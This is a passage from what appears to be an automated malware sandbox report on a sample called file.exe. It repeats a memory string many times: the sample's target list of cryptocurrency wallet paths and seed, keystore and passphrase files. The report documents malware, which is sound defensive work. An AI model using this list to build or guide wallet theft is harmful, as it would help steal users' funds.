Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia 